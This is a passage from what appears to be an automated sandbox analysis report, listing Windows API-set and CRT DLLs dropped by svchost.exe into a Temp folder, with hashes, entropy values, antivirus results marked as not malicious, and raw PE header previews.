                                SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processenvironment-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19248
                                Entropy (8bit):7.073730829887072
                                Encrypted:false
                                SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                MD5:5F73A814936C8E7E4A2DFD68876143C8
                                SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19392
                                Entropy (8bit):7.082421046253008
                                Encrypted:false
                                SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                MD5:A2D7D7711F9C0E3E065B2929FF342666
                                SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-1.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18744
                                Entropy (8bit):7.1156948849491055
                                Encrypted:false
                                SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                MD5:D0289835D97D103BAD0DD7B9637538A1
                                SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-profile-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):17712
                                Entropy (8bit):7.187691342157284
                                Encrypted:false
                                SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-rtlsupport-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):17720
                                Entropy (8bit):7.19694878324007
                                Encrypted:false
                                SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-string-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.137724132900032
                                Encrypted:false
                                SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                MD5:12CC7D8017023EF04EBDD28EF9558305
                                SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20280
                                Entropy (8bit):7.04640581473745
                                Encrypted:false
                                SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                MD5:71AF7ED2A72267AAAD8564524903CFF6
                                SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-2-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18744
                                Entropy (8bit):7.138910839042951
                                Encrypted:false
                                SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-sysinfo-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19248
                                Entropy (8bit):7.072555805949365
                                Encrypted:false
                                SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                MD5:19A40AF040BD7ADD901AA967600259D9
                                SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-timezone-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18224
                                Entropy (8bit):7.17450177544266
                                Encrypted:false
                                SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                MD5:BABF80608FD68A09656871EC8597296C
                                SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-util-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18232
                                Entropy (8bit):7.1007227686954275
                                Encrypted:false
                                SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                MD5:0F079489ABD2B16751CEB7447512A70D
                                SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-conio-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19256
                                Entropy (8bit):7.088693688879585
                                Encrypted:false
                                SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                MD5:6EA692F862BDEB446E649E4B2893E36F
                                SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-convert-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):22328
                                Entropy (8bit):6.929204936143068
                                Encrypted:false
                                SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                MD5:72E28C902CD947F9A3425B19AC5A64BD
                                SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-environment-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18736
                                Entropy (8bit):7.078409479204304
                                Encrypted:false
                                SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-filesystem-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20280
                                Entropy (8bit):7.085387497246545
                                Encrypted:false
                                SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                MD5:AEC2268601470050E62CB8066DD41A59
                                SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-heap-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19256
                                Entropy (8bit):7.060393359865728
                                Encrypted:false
                                SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-locale-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18744
                                Entropy (8bit):7.13172731865352
                                Encrypted:false
                                SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-math-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):28984
                                Entropy (8bit):6.6686462438397
                                Encrypted:false
                                SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                MD5:8B0BA750E7B15300482CE6C961A932F0
                                SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
